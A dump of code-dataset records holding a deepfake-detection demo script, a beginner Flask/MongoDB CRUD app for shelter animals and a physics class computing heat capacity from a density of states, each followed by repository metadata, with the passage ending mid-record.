detector\n self.mean = np.float32([0.485, 0.456, 0.406]) * 255\n self.std = np.float32([0.229, 0.224, 0.225]) * 255\n self._frames = None\n self._boxes = None\n\n @property\n def frames(self):\n if self._frames is None:\n vr = VideoReader(self.src)\n sampled_idxs = np.linspace(0, len(vr) - 1, self.n_frames, dtype=int).tolist()\n self._frames = list(vr.get_batch(sampled_idxs).asnumpy())\n return self._frames\n \n @property\n def boxes(self):\n if self._boxes is None:\n self._boxes = self.detector(self.frames)\n return self._boxes\n\n def crop(self, margin=1.3):\n cx, cy = self.boxes[:, 0], self.boxes[:, 1]\n hw = self.boxes[:, 2:].max(-1) * margin\n rois = np.stack([cx - hw / 2, cy - hw /2, cx + hw / 2, cy + hw / 2], 1).clip(0)\n clip = []\n for frame, roi in zip(self.frames, rois.tolist()):\n x0, y0, x1, y1 = map(int, roi)\n clip.append(cv2.resize(frame[y0:y1, x0:x1], self.img_size, interpolation=cv2.INTER_LINEAR))\n return clip\n\n def load_cropped_frames(self, margin=1.3):\n cx, cy = self.boxes[:, 0], self.boxes[:, 1]\n hw = self.boxes[:, 2:].max(-1) * margin\n rois = np.stack([cx - hw / 2, cy - hw /2, cx + hw / 2, cy + hw / 2], 1).clip(0)\n clip = []\n for frame, roi in zip(self.frames, rois.tolist()):\n x0, y0, x1, y1 = map(int, roi)\n clip.append(cv2.resize(frame[y0:y1, x0:x1], self.img_size, interpolation=cv2.INTER_LINEAR))\n clip = (np.float32(clip) - self.mean) / self.std\n clip = np.ascontiguousarray(clip.transpose(0, 3, 1, 2))\n return torch.from_numpy(clip)\n\n\nclass VideoWriter:\n def __init__(self, filename, fps=24) -> None:\n self.filename = filename\n if self.filename:\n os.makedirs(os.path.dirname(filename), 
exist_ok=True)\n self.fps = fps\n self.p = None\n \n def write(self, frame):\n if not self.filename:\n return\n if self.p is None:\n h, w, _ = frame.shape\n self.p = subprocess.Popen([\n \"ffmpeg\",\n '-y', # overwrite output file if it exists\n '-f', 'rawvideo',\n '-vcodec','rawvideo',\n '-s', f'{w}x{h}', # size of one frame\n '-pix_fmt', 'bgr24',\n '-r', f'{self.fps}', # frames per second\n '-i', '-', # The imput comes from a pipe\n '-s', f'{w}x{h}',\n '-an', # Tells FFMPEG not to expect any audio\n '-loglevel', 'error',\n '-b:v', '800k',\n '-pix_fmt', 'yuv420p',\n self.filename\n ], stdin=subprocess.PIPE)\n self.p.stdin.write(frame.tobytes())\n\n def close(self):\n if self.p:\n self.p.stdin.flush()\n self.p.stdin.close()\n self.p.wait()\n\n\n@torch.no_grad()\ndef main():\n parser = argparse.ArgumentParser(add_help=False)\n parser.add_argument('-i', '--input', type=str,\n default='data/ffpp_videos/manipulated_sequences/Deepfakes/c40/videos/000_003.mp4')\n parser.add_argument('-c', '--config', type=str, default='configs/ffpp_x3d_inference.yaml')\n parser.add_argument('-d', '--device', type=str,\n default='cuda' if torch.cuda.is_available() else 'cpu')\n parser.add_argument('--n_frames', type=int, default=16)\n parser.add_argument('--detector', type=str,\n default='https://github.com/zyayoung/oss/releases/download/rdd/yolov5s-face.pt')\n parser.add_argument('--resume', type=str,\n default='https://github.com/zyayoung/oss/releases/download/rdd/ffpp_x3d.pth')\n args = parser.parse_args()\n\n oc_cfg = OmegaConf.load(args.config)\n oc_cfg.merge_with(vars(args))\n args = oc_cfg\n\n device = torch.device(args.device)\n print(\"Loading face detection model...\", end=' ', flush=True)\n detector = Detector(args.detector, device)\n print(\"Done\")\n\n print(\"Loading fogery detection model...\", end=' ', flush=True)\n model = models.__dict__[args.model.name](**args.model.params)\n state_dict = load_model(args.resume, map_location='cpu')\n if isinstance(state_dict, dict) and 'state_dict' in state_dict:\n state_dict = state_dict['state_dict']\n model.load_state_dict({\n k.replace('module.', ''): v for k, v in state_dict.items()})\n model.set_segment(args.n_frames)\n model.to(device).eval()\n print(\"Done\")\n target_layers = [model.rgb_blocks[-2], model.blocks[-2]]\n\n os.makedirs('figs/df_det', exist_ok=True)\n os.makedirs('figs/face_det', exist_ok=True)\n os.makedirs('figs/cropped', exist_ok=True)\n os.makedirs('figs/cam', exist_ok=True)\n for src in glob(\"data/ffpp_videos/*/*/c40/videos/00*.mp4\"):\n print(\"Detecting...\", end=' ', flush=True)\n video = FaceVideo(src, detector, n_frames=args.n_frames)\n frames = video.load_cropped_frames()\n frames = frames.flatten(0, 1).to(device, non_blocking=True)\n\n cam_model = ActivationsAndGradients(model, target_layers, None)\n pred = model(frames[None])[0]\n real_prob = pred.softmax(-1)[0].item()\n print(\"Done\")\n\n label = 'Fake' if real_prob < 0.5 else 'Real'\n confidence = 1 - real_prob if real_prob < 0.5 else real_prob\n print(f'Result: {label}; Confidence: {confidence:.2f}')\n _, _, _, method, _, _, name = src.split('/')\n\n vw_cam = VideoWriter(os.path.join('figs/cam', f'{method}_{name}'), 2)\n with torch.enable_grad():\n cam_model(frames[None])[0, 1 if real_prob < 0.5 else 0].backward(retain_graph=True)\n\n # pull the gradients out of the cam_model\n heat_map_sum = 0\n for gradient, activation in zip(cam_model.gradients, cam_model.activations):\n activation *= gradient.mean((2, 3, 4), True)\n heat_map = activation[0].mean(0).relu()\n 
heat_map_sum = heat_map_sum + heat_map\n heat_map_sum.div_(heat_map_sum.max())\n for heat_map, frame in zip(heat_map_sum.cpu().numpy(), video.crop()):\n img = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)\n heatmap1 = cv2.resize(heat_map, (frame.shape[1], frame.shape[0]))\n heatmap1 = np.uint8(255 * (heatmap1))\n heatmap1 = cv2.applyColorMap(heatmap1, cv2.COLORMAP_JET)\n vw_cam.write(heatmap1 // 2 + img // 2)\n vw_cam.close()\n cam_model.release()\n\n h, w = video.frames[0].shape[:2]\n tl = max(1, round(0.002 * (h + w)) ) # line/font thickness\n video = FaceVideo(src, detector, n_frames=128)\n vw_df = VideoWriter(os.path.join('figs/df_det', f'{method}_{name}'), 16)\n vw_face = VideoWriter(os.path.join('figs/face_det', f'{method}_{name}'), 16)\n vw_crop = VideoWriter(os.path.join('figs/cropped', f'{method}_{name}'), 16)\n for i, (frame, cropped, box) in enumerate(zip(video.frames, video.crop(), video.boxes)):\n x, y, w, h = box\n x1, y1, x2, y2 = map(int, (x-w/2, y-h/2, x+w/2, y+h/2))\n color = (0, 0, 255) if real_prob < 0.5 else (0, 255, 0)\n img = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)\n img_df = cv2.rectangle(img.copy(), (x1, y1), (x2, y2), color, tl)\n img_df = cv2.putText(img_df, label, (x1, y1 - tl * 2), 0, tl, color, tl, cv2.LINE_AA)\n vw_df.write(img_df)\n cropped = cv2.cvtColor(cropped, cv2.COLOR_RGB2BGR)\n vw_crop.write(cropped)\n img_face = cv2.rectangle(img.copy(), (x1, y1), (x2, y2), (255, 255, 255), tl)\n vw_face.write(img_face)\n vw_df.close()\n vw_face.close()\n vw_crop.close()\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "ThreeCatsLoveFish/RDD", "sub_path": "model/demo.py", "file_name": "demo.py", "file_ext": "py", "file_size_in_byte": 9843, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 24, "dataset": "github-code", "pt": "31", "api": [{"api_name": "torch.hub.load_state_dict_from_url", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.hub", "line_number": 20, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 23, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.INTER_AREA", "line_number": 44, "usage_type": "attribute"}, {"api_name": "cv2.INTER_LINEAR", "line_number": 44, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.ascontiguousarray", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 70, "usage_type": "call"}, {"api_name": "decord.VideoReader", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 91, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 95, "usage_type": "call"}, {"api_name": "cv2.INTER_LINEAR", "line_number": 95, "usage_type": "attribute"}, {"api_name": "numpy.stack", "line_number": 101, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 105, "usage_type": "call"}, {"api_name": "cv2.INTER_LINEAR", "line_number": 105, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.ascontiguousarray", "line_number": 107, "usage_type": "call"}, {"api_name": 
"torch.from_numpy", "line_number": 108, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path", "line_number": 115, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 124, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 139, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 151, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 156, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 156, "usage_type": "attribute"}, {"api_name": "omegaconf.OmegaConf.load", "line_number": 164, "usage_type": "call"}, {"api_name": "omegaconf.OmegaConf", "line_number": 164, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 168, "usage_type": "call"}, {"api_name": "models.__dict__", "line_number": 174, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 185, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 186, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 187, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 188, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 189, "usage_type": "call"}, {"api_name": "pytorch_grad_cam.ActivationsAndGradients", "line_number": 195, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 205, "usage_type": "call"}, {"api_name": "os.path", "line_number": 205, "usage_type": "attribute"}, {"api_name": "torch.enable_grad", "line_number": 206, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 217, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 217, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 218, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 219, "usage_type": "call"}, {"api_name": "cv2.applyColorMap", "line_number": 220, "usage_type": "call"}, {"api_name": "cv2.COLORMAP_JET", "line_number": 220, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 228, "usage_type": "call"}, {"api_name": "os.path", "line_number": 228, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 229, "usage_type": "call"}, {"api_name": "os.path", "line_number": 229, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 230, "usage_type": "call"}, {"api_name": "os.path", "line_number": 230, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 235, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 235, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 236, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 237, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 237, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 239, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 239, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 241, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 149, "usage_type": "call"}]}
+{"seq_id": "69926018013", "text": "from flask import Flask, render_template, request, redirect, url_for\nimport os\nimport pymongo\nfrom dotenv import load_dotenv\n\n# to use ObjectId to access an item in mongo db\nfrom bson.objectid import ObjectId\n\n# To allow the use of .env file\nload_dotenv()\n\napp = Flask(__name__)\n\n# this is to retrieve info/setting from .\n# env file via the arg in os.environ.get()\nMONGO_URI = os.environ.get('MONGO_URI')\n\nDB_NAME = 'tgc10_new_shelter'\nclient = pymongo.MongoClient(MONGO_URI)\ndb = client[DB_NAME]\n\n\n@app.route('/animals')\ndef show_all_animals():\n animals = db.animals.find()\n return render_template('show_animals.template.html',\n htmlanimals=animals)\n\n\n@app.route('/animals/create')\ndef show_create_animals():\n return render_template('create_animals.template.html')\n\n\n@app.route('/animals/create', methods=['POST'])\ndef process_create_animals():\n name = request.form.get('name')\n breed = request.form.get('breed')\n age = request.form.get('age')\n animal_type = request.form.get('type')\n\n # insert only ONE new document\n db.animals.insert_one(\n {\n \"name\": name,\n \"age\": age,\n \"breed\": breed,\n \"type\": animal_type\n }\n )\n\n return redirect(url_for('show_all_animals'))\n\n# this route is to get the id to be deleted\n# and prompt the user for confirmation\n\n\n@app.route('/animals//delete')\ndef delete_animal(animal_id):\n animal = db.animals.find_one(\n {\n \"_id\": ObjectId(animal_id)\n }\n )\n\n return render_template('confirm_delete_animal.template.html',\n animal_to_delete=animal)\n\n\n@app.route('/animals//delete', methods=[\"POST\"])\ndef process_delete_animal(animal_id):\n db.animals.remove({\n \"_id\": ObjectId(animal_id)\n })\n\n return redirect(url_for('show_all_animals'))\n\n\n@app.route('/animals//update')\ndef show_update_animal(animal_id):\n animal_to_edit = db.animals.find_one(\n {\n \"_id\": ObjectId(animal_id)\n }\n )\n\n return render_template('show_update_animal.template.html',\n html_animal_to_edit=animal_to_edit)\n\n\n@app.route('/animals//update', methods=['POST'])\ndef process_update_animals(animal_id):\n db.animals.update_one(\n {\n \"_id\": ObjectId(animal_id)\n },\n {\n \"$set\": request.form\n }\n )\n\n return redirect(url_for('show_all_animals'))\n\n\nif __name__ == '__main__':\n app.run(host=os.environ.get('IP'), port=os.environ.get('PORT'),\n debug=True)\n", "repo_name": "simplyedwin/tgc10-flask-mongodb", "sub_path": "shelter/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 2604, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 10, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 12, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 16, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 16, "usage_type": "attribute"}, {"api_name": "pymongo.MongoClient", "line_number": 19, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 26, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 32, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 37, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 37, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 37, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.request.form", 
"line_number": 38, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 38, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 39, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 39, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 39, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 40, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 40, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 40, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 52, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 52, "usage_type": "call"}, {"api_name": "bson.objectid.ObjectId", "line_number": 62, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 66, "usage_type": "call"}, {"api_name": "bson.objectid.ObjectId", "line_number": 73, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 76, "usage_type": "call"}, {"api_name": "bson.objectid.ObjectId", "line_number": 83, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 87, "usage_type": "call"}, {"api_name": "bson.objectid.ObjectId", "line_number": 95, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 98, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 98, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 102, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 102, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 106, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 106, "usage_type": "attribute"}]}
+{"seq_id": "7646758848", "text": "#! /usr/bin/python\n\n#import numpy as np\n#import re\n\n#from scipy.optimize import leastsq\n#from scipy import constants\n#import matplotlib.pyplot as plt\nimport numpy as np\nimport collections\nimport re\n\nclass hc_dos:\n \"\"\"to to: if input dimensions do not match, e.g. T is Nx1 and B is Mx1, understand it as mx1 per element of T\"\"\"\n def __init__(self, histfile = None, expfile = None, datasource = 'PPMS'):\n \"\"\"\n Utility class for calculating the heat capacity of a gapped triplonic (Schottky-term) system based on \n - a given density of states\n - a multilevel-system with given energies\n \n and of a phononic system based on the Einstein and Debye-approximation\n Initializes the DOS-histogram by pickle-loading it from path. Later, we will try to include simple\n string files, if needed\n \n The DoS has to be given as a function of energy in meV\n\n The heat capacity is calculated in J per mole (Joule per 6.022e23 particles/atoms/unit cell)\n Input:\n\n path_to_dos_hist: String, leading to the histogram file\n \n \n \"\"\"\n from scipy import constants \n\n self.fac_meVtoK = constants.e * 1e-3 / constants.k #factor to get energies in K from energies in meV\n self.muB = constants.physical_constants['Bohr magneton in K/T'][0] #muB divided by kB in K/T\n self.kmol = constants.k * constants.N_A\n if not histfile == None:\n self.load_dos(histfile)\n if not expfile == None:\n self.load_data(expfile)\n\n def load_dos(self, path):\n \"\"\"loading the dos histogram, expects plain text\n 'energies'\n energies\n 'count'\n count\n \"\"\"\n #load the histogram\n with open(path) as datei:\n dos_hist = []\n for line in datei:\n if 'energies' in line or 'count' in line:\n dos_hist.append(np.array([]))\n else:\n dos_hist[-1] = np.append(dos_hist[-1], float(line))\n\n #find the lower and upper bound of the unperturbed dos\n self.Emin_raw, self.Emax_raw = dos_hist[0].min() * self.fac_meVtoK, dos_hist[0].max() * self.fac_meVtoK \n #get the energy spacing\n self.deltaE = (dos_hist[0][1:] - dos_hist[0][:-1]).mean() * self.fac_meVtoK \n #get the distribution\n self.dos_pdf = np.asarray(dos_hist[1], dtype = float)\n #and normalize it\n self.dos_pdf /= self.dos_pdf.sum()\n self.Emin = self.Emin_raw\n self.Emax = self.Emax_raw\n\n def load_data(self, path, datasource = 'PPMS', Nmol = 1, mass =1, method = 'replace'):\n \"\"\" takes the files in path and loads the data from there\n INPUT:\n path: string or iterable list of strings, not nested\n \"\"\"\n# pdb.set_trace()\n if isinstance(path, basestring):\n path = np.array([path])\n for p in path:\n try:\n data = np.append(data, np.atleast_2d(self._load_data_single(p)), axis = 0)\n except:\n data = np.atleast_2d(self._load_data_single(p))\n data[:,2] /= Nmol #convert from Joule per K to Joule per mole and K\n\n if method == 'replace':\n self.T_exp = data[:,1]\n self.B_exp = data[:,0]\n self.C_exp = data[:,2] \n\n elif method == 'add':\n self.T_exp = np.append(self.T_exp, data[:,1])\n self.B_exp = np.append(self.B_exp, data[:,0])\n self.C_exp = np.append(self.C_exp, data[:,2])\n\n def _load_data_single(self, path, datasource = 'PPMS'):\n \"\"\"loads the data from one file\n INPUT:\n path: string, path to file\n OUTPUT:\n data: N x 3 array with\n data[:,0] : field in T\n data[:,1] : temperature in K\n data[:,2] : heat capacity in J/K\n \"\"\"\n C_factors = {'\\xb5J/K' : 1e-6, #microJoule per Kelvin\n }\n if datasource == 'PPMS':\n #we expect a sample heat capacity in microJoule per K\n with open(path, 'r') as f:\n for 
line in f:\n if 'Time Stamp' in line:\n self.unit = line.split(',')[9].split()[-1].strip('()')\n break\n\n with open(path, 'r') as f:\n lines = (line for line in f if not re.search('[a-zA-DF-Z]', line))\n data = np.genfromtxt(lines, delimiter = ',', usecols = (5, 4, 9))\n data[:,0] /= 1e4 #convert from Oe to T\n data[:,2] *= C_factors[self.unit] #convert from microJoule to Joule\n return data\n\n def _dos_raw(self, energy, S):\n \"\"\"returns the density of states for states with a total spin of S\n Input:\n energy: float or array of floats, energy at which the DoS should be given\n S int or array of ints, total spin of the state to be examined\n \n Output:\n dos: array of float, density of states\n \"\"\"\n energy = np.atleast_1d(energy)\n S = np.atleast_1d(S)\n# else: #if energy is a list or an array etc. (iterable) \n energy = np.atleast_1d(energy) #make sure the energy is an array\n dos = np.zeros(energy.shape[0])\n #the positions in the dos-histogram are the differences of energy and minimum energy in units of deltaE\n maske = np.where((S==0) & (energy < self.deltaE/2) & (energy >- self.deltaE/2)) #S=0 and energies close to zero\n dos[maske] = 1.0 #where S=0, the dos is 1.0 close to zero (N states for N particles) (also outside the band)\n\n# pdb.set_trace()\n maske = np.where((S==1) & (energy > self.Emin) & (energy < self.Emax)) #all energies with S=1 in the band\n indices = np.asarray((energy - self.Emin) / self.deltaE, dtype=int) #\n dos[maske] = self.dos_pdf[indices[maske]] #the dos is given by the values of the histogram at the \"indices\"-positions\n\n return dos\n\n def dos(self, energy, spinstate, field, g=1.94):\n \"\"\"returns the density of states for the given energy, field, and involved spinstates\n Input:\n energy: n x 1 float array of energies, unit: K (energy divided by kB)\n spinstate: n x 4 x 2 float array of involved spin states S,m\n field: n x 1 float array of fields, unit: T\n\n Output:\n dos: n x 1 array, dtype=float, unit: 1/K\n \"\"\"\n\n n = energy.shape[0]\n energy = np.atleast_1d(energy)\n energy = energy.reshape(n, 1) #build a (n, 1)-array as it may be a (n,) array \n energy = np.tile(energy, spinstate.shape[1])\n\n field = np.atleast_1d(field)\n field = field.reshape(field.shape[0], 1)\n field = np.tile(field, spinstate.shape[1])\n \n energy = energy + spinstate[:, :, 1] * g * self.muB * field #transform the energy back to the fieldless case for each m\n\n S = spinstate[:,:,0].reshape(energy.shape[0] * energy.shape[1]) #1-dim array of the first spin quantum number\n energy = energy.reshape(energy.shape[0] * energy.shape[1]) #convert it to a 1-dim array\n \n dos = self._dos_raw(energy, S)\n dos = dos.reshape(n, dos.shape[0]/n)\n dos = dos.sum(axis=1)\n return dos\n \n def C_el_dos(self, B, T, g = 1.94):\n \"\"\"\n calculates the specific heat of the system for the given fields and temperatures\n Input:\n B: n x 1 array, dtype = float, unit: T (Tesla)\n T: n x 1 array, dtype = float, unit: K (Kelvin)\n \"\"\"\n# pdb.set_trace()\n Emin = min(0, self.Emin - g * self.muB * max(B)) #get the global minimum of the energy for all fields\n Emax = self.Emax + g * self.muB * max(B) #get the global maximum of the energy for all fields\n \n E = np.arange(Emin, Emax, self.deltaE)\n N = E.shape[0]\n e = np.tile(E, B.shape[0])\n\n n = B.shape[0]\n b = np.repeat(B, N)\n\n d = np.array([[0, 0], [1, 1], [1, 0], [1, -1]])\n d = d.reshape(1, d.shape[0], d.shape[1])\n d = np.tile(d, (b.shape[0], 1, 1))\n\n# return E.shape, B.shape, d.shape\n dos = self.dos(e, d, b) \n dos = 
dos.reshape(n,N).T \n\n E = E.reshape(E.shape[0], 1)\n\n bes_fak = - np.outer(E, 1/T)\n bes_fak = np.exp(bes_fak)\n\n A = dos * E**2 * bes_fak\n A = A.sum(axis = 0)\n\n B = dos * E * bes_fak\n B = B.sum(axis = 0)\n\n Z = dos * bes_fak\n Z = Z.sum(axis = 0)\n \n C = (A*Z - B**2) / Z**2\n\n return self.kmol * C/T**2\n \n def c_level(self, e, m, T, B = np.array([0])):\n \"\"\"\n calculates the heat capacity of a multi-level system with a Zeeman-splitting\n \n input:\n e: M x 1 - array of energies for the level, given in units of K (E/kB), \n d: M x 1 - array of degeneracies of the levels\n m: M x 1 - array of magnetic moments of the levels (-1, 1, 1)\n \n T: N x 1 - array of sample temperatures in K\n B: N x 1 - array of applied magnetic fields in Tesla\n \"\"\"\n g = 1.94 #lande g-factor\n# muB = constants.physical_constants['Bohr magneton in K/T'][0] #muB devided by kB\n e = np.asarray(e, dtype = float) #making sure that the energies are a floating point array\n T = np.asarray(T, dtype = float) #making sure that the temperatures are a floating point array\n B = np.asarray(B, dtype = float) #making sure that the fields are a floating point array\n B = g * self.muB * B \n energies = e[:, np.newaxis] * np.ones((e.shape[0], B.shape[0])) #initialize the energies for each measurement point\n energies -= np.outer(m, B) \n boltz_fac = np.exp( -energies / T )\n \n A = energies * energies * boltz_fac\n A = A.sum(axis=0)\n \n B = energies * boltz_fac\n B = B.sum(axis=0)\n \n Z = boltz_fac\n Z = Z.sum(axis=0)\n \n return self.kmol * (A * Z - B * B) / (Z * Z) / T**2\n\n def c_schottky(self, T, deltaE):\n \"\"\"convenience function to be able to simulate a 2-level system without to much input\"\"\"\n e = np.array([0, deltaE])\n m = np.array([0, 0])\n return self.c_level(e, m, T)\n\n def C_ph_Debye(self, T, T_D):\n T = np.asarray(T, dtype=float)\n if isinstance(T, (collections.Sequence, np.ndarray)):\n stepsize = 1e-3\n c = np.zeros(T.shape[0])\n for index, t in enumerate(T):\n x = np.arange(1e-3, T_D / t, stepsize)\n y = x**4 * np.exp(x) / (np.exp(x) - 1)**2\n c[index] = 9 * sum(y) * stepsize * ( t / T_D )**3\n else:\n x = np.arange(1e-3, T_D / T, 1e-3)\n y = x**4 * np.exp(x) / (np.exp(x) - 1)**2\n c = 9 * sum(y) * (x[1:]-x[:-1]).mean() * ( T / T_D )**3\n return c * self.kmol\n \n def C_ph_Einstein(self, T, T_E):\n T = np.asarray(T, dtype=float)\n return 3 * self.kmol * (T_E / T)**2 * np.exp(T_E/T) / (np.exp(T_E/T) - 1)**2\n\nif __name__ == \"__main__\":\n pass\n", "repo_name": "henrikgrundmann/heatcapacity", "sub_path": "hc_dos.py", "file_name": "hc_dos.py", "file_ext": "py", "file_size_in_byte": 11195, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "scipy.constants.e", "line_number": 36, "usage_type": "attribute"}, {"api_name": "scipy.constants", "line_number": 36, "usage_type": "name"}, {"api_name": "scipy.constants.k", "line_number": 36, "usage_type": "attribute"}, {"api_name": "scipy.constants.physical_constants", "line_number": 37, "usage_type": "attribute"}, {"api_name": "scipy.constants", "line_number": 37, "usage_type": "name"}, {"api_name": "scipy.constants.k", "line_number": 38, "usage_type": "attribute"}, {"api_name": "scipy.constants", "line_number": 38, "usage_type": "name"}, {"api_name": "scipy.constants.N_A", "line_number": 38, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 58, "usage_type": "call"}, {"api_name": 
"numpy.asarray", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.atleast_2d", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.atleast_2d", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 94, "usage_type": "call"}, {"api_name": "re.search", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.genfromtxt", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.atleast_1d", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.atleast_1d", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.atleast_1d", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.atleast_1d", "line_number": 160, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.atleast_1d", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.repeat", "line_number": 194, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 196, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.outer", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 222, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 236, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 237, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 238, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 240, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 240, "usage_type": "call"}, {"api_name": "numpy.outer", "line_number": 241, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 242, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 257, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 258, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 262, "usage_type": "call"}, {"api_name": "collections.Sequence", "line_number": 263, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 263, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 265, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 267, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 268, "usage_type": "call"}, 